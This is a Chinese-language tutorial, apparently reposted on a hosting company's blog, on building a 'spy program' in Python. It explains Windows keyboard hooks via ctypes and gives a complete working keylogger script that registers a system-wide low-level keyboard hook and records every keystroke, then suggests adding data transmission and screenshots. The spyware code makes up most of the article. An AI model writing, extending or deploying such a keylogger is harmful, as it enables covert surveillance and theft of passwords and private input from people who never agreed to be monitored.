溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

使用Python打造一款間諜程序的流程分析

發(fā)布時(shí)間:2020-10-07 15:30:35 來(lái)源:腳本之家 閱讀:163 作者:寂夜云 欄目:開發(fā)技術(shù)

知識(shí)點(diǎn)

這次我們使用python來(lái)打造一款間諜程序

程序中會(huì)用到許多知識(shí)點(diǎn),大致分為四塊

  win32API 此處可以在MSDN上查看

  Python基礎(chǔ)重點(diǎn)在cpytes庫(kù)的使用,使用方法請(qǐng)點(diǎn)擊此處

  C語(yǔ)言基礎(chǔ)

  Hook

程序的基本原理在于通過(guò)注冊(cè)Hook,記錄系統(tǒng)事件

那么什么是Hook呢

Hook 技術(shù)又叫做鉤子函數(shù),系統(tǒng)在調(diào)用函數(shù)之前,鉤子程序就先捕獲該消息,鉤子函數(shù)先得到控制權(quán),這時(shí)鉤子函數(shù)既可以加工處理(改變)該函數(shù)的執(zhí)行行為,還可以強(qiáng)制結(jié)束消息的傳遞

注冊(cè)Hook時(shí)我們需要先導(dǎo)入DLL庫(kù),在Python中我們使用ctypes來(lái)導(dǎo)入,導(dǎo)入方法如下

user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")

我們導(dǎo)入了user32.dll和kernel32.dll

這兩個(gè)DLL有什么用處呢

  user32.dll   是Windows用戶界面相關(guān)應(yīng)用程序接口,用于包括Windows處理,基本用戶界面等特性,如創(chuàng)建窗口和發(fā)送消息

  kernel32.dll  控制著系統(tǒng)的內(nèi)存管理、數(shù)據(jù)的輸入輸出操作和中斷處理

流程部分

知道了我們要使用什么樣的工具,那么第一步應(yīng)該怎么做呢

1.首先我們需要先注冊(cè)Hook到系統(tǒng)上,通過(guò)user32.dll中的SetWindowsHookExA函數(shù),我們可以在系統(tǒng)上注冊(cè)鉤子

HHOOK SetWindowsHookExA(
 int idHook,
 HOOKPROC lpfn,
 HINSTANCE hmod,
 DWORD dwThreadId
);

通過(guò)查看文檔我們看到SetWindowsHookExA函數(shù)的參數(shù)及參數(shù)類型如上所示,詳細(xì)文檔點(diǎn)擊此鏈接查看

通過(guò)文檔我們看到第一個(gè)參數(shù)idHook中填入鉤子的類型

WH_KEYBOARD_LL的常量值為13代表的意思是監(jiān)視低級(jí)鍵盤輸入事件,我們此處來(lái)監(jiān)聽鍵盤事件

第二個(gè)參數(shù)lpfn代表指向鉤子過(guò)程的指針,要填入鉤子過(guò)程(函數(shù)),我們可以在此處來(lái)添加額外代碼達(dá)到我們想要達(dá)成的目的

第三個(gè)參數(shù)hmod表示為DLL句柄,我們可以使用kernel32中的GetModuleHandleW來(lái)獲取句柄

最后一個(gè)參數(shù)dwThreadId我們填入0代表與同一桌面上所有的線程關(guān)聯(lián)

代碼如下

user32.SetWindowsHookExA(13,handleProc,kernel32.GetModuleHandleW(),0)

如何使用Python來(lái)編寫我們的鉤子過(guò)程呢,通過(guò)ctypes文檔我們可以得知windows下使用WINFUNCTYPE來(lái)創(chuàng)建函數(shù)

此時(shí)我們發(fā)現(xiàn)有WINFUNCTYPE和CFUNCTYPE兩個(gè)函數(shù),具體要使用哪一個(gè)呢,這兩個(gè)的區(qū)別為

  WINFUNCTYPE  為Windows下獨(dú)有的,通過(guò)使用使用stdcall調(diào)用約定的函數(shù)

  CFUNCTYPE   使用標(biāo)準(zhǔn)C調(diào)用約定的函數(shù)

HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))

因?yàn)槲覀冋{(diào)用的是WH_KEYBOARD_LL,WH_KEYBOARD_LL會(huì)使用LowLevelKeyboardProc回調(diào)函數(shù),同時(shí)我們也需要在Python定義它

LowLevelKeyboardProc數(shù)據(jù)結(jié)構(gòu)如下

LRESULT CALLBACK LowLevelKeyboardProc(
 _In_ int nCode,
 _In_ WPARAM wParam,
 _In_ LPARAM lParam
);

按照官方文檔提示如果nCode小于零,則掛鉤過(guò)程必須將消息傳遞給CallNextHookEx函數(shù),而無(wú)需進(jìn)一步處理,并且應(yīng)返回CallNextHookEx返回的值

我們轉(zhuǎn)換為Python代碼

class KBDLLHOOKSTRUCT(Structure):
 _fields_ = [
 ('vkCode', DWORD),
 ('scanCode', DWORD),
 ('flags', DWORD),
 ('time', DWORD),
 ('dwExtraInfo', DWORD)]

def hookProc(nCode, wParam, lParam):
 if nCode < 0:
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
 else:
 # 此處插入我們的代碼
 pass
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)

最后在我們退出程序時(shí)還需要?jiǎng)h除Hook,不然大量的Hook會(huì)使系統(tǒng)運(yùn)行緩慢,雖然在Windows 7及更高版本上,該鉤子會(huì)被靜默刪除而不被調(diào)用。應(yīng)用程序無(wú)法知道掛鉤是否已刪除。我們還是主動(dòng)進(jìn)行刪除

刪除需要使用user32.dll的UnhookWindowsHookEx,參數(shù)為Hook句柄

user32.UnhookWindowsHookEx(hooked)

下面貼上全部代碼

import sys
from ctypes import *
from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAM
user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")
class KBDLLHOOKSTRUCT(Structure):
 _fields_ = [
 ('vkCode', DWORD),
 ('scanCode', DWORD),
 ('flags', DWORD),
 ('time', DWORD),
 ('dwExtraInfo', DWORD)]
def uninstallHookProc(hooked):
 if hooked is None:
 return
 user32.UnhookWindowsHookEx(hooked)
 hooked = None
def hookProc(nCode, wParam, lParam):
 if nCode < 0:
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
 else:
 if wParam == 256:
 if 162 == lParam.contents.value:
 print("Ctrl pressed, call Hook uninstall()")
 uninstallHookProc(hooked)
 sys.exit(-1)
 capsLock = user32.GetKeyState(20)
 # kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT))
 if lParam.contents.value==13:
 print("\n")
 elif capsLock:
 print(chr(lParam.contents.value),end="")
 else:
 print(chr(lParam.contents.value+32),end="")
 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
def startKeyLog():
 msg = MSG()
 user32.GetMessageA(byref(msg), 0, 0, 0)
def installHookProc(hooked, pointer):
 hooked = user32.SetWindowsHookExA(
 13,
 pointer,
 kernel32.GetModuleHandleW(),
 0
 )
 if not hooked:
 return False
 return True
HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
pointer = HOOKPROC(hookProc)
hooked = None
if installHookProc(hooked, pointer):
 print("Hook installed")
 try:
 msg = MSG()
 user32.GetMessageA(byref(msg), 0, 0, 0)
 except KeyboardInterrupt as kerror:
 uninstallHookProc(hooked)
 print("Hook uninstall...")
else:
 print("Hook installed error")

貼上我們的效果圖

使用Python打造一款間諜程序的流程分析

我們還可以再添加上額外的代碼比如數(shù)據(jù)傳輸,截屏等等 ^_^

如何想要了解更多的只是請(qǐng)點(diǎn)擊這里把 => 地址

總結(jié)

以上就是使用Python打造一款間諜程序的流程分析的詳細(xì)內(nèi)容,更多關(guān)于python間諜程序請(qǐng)關(guān)注億速云其它相關(guān)文章!

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI